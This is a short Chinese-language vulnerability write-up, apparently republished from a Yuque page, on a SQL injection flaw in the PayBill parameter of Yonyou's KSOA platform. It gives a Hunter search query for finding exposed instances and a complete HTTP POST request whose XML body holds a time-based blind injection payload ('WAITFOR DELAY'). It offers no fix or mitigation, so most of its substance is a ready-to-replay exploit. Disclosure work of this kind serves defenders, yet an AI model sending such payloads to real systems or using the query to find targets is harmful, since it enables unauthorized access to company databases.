登录 白背景

用友时空KSOA PayBill参数存在SQL注入漏洞

一、漏洞简介

<font style="color:rgba(0, 0, 0, 0.9);">用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。用友时空KSOA平台PayBill参数存在SQL注入漏洞。</font>

<font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>

  • 用友时空KSOA

三、资产测绘

  • hunterapp.name="用友时空 KSOA"

1692118414187-50a002bf-7b35-4a5e-9cca-410e053dfd86.png

  • 登录页面

1692118428299-ee3e89a1-d166-4649-b288-943ccd7d5fc7.png

四、漏洞复现

POST /servlet/PayBill?caculate&_rnd= HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 142
Accept-Encoding: gzip, deflate
Connection: close

<?xml version="1.0" encoding="UTF-8" ?><root><name>1</name><name>1'WAITFOR DELAY '00:00:03';--+</name><name>1</name><name>102360</name></root>

1695486960457-89f27097-bdfa-4b06-b907-57d4824661b0.png

原文: https://www.yuque.com/xiaokp7/ocvun2/qcpy5w238uhcl9ah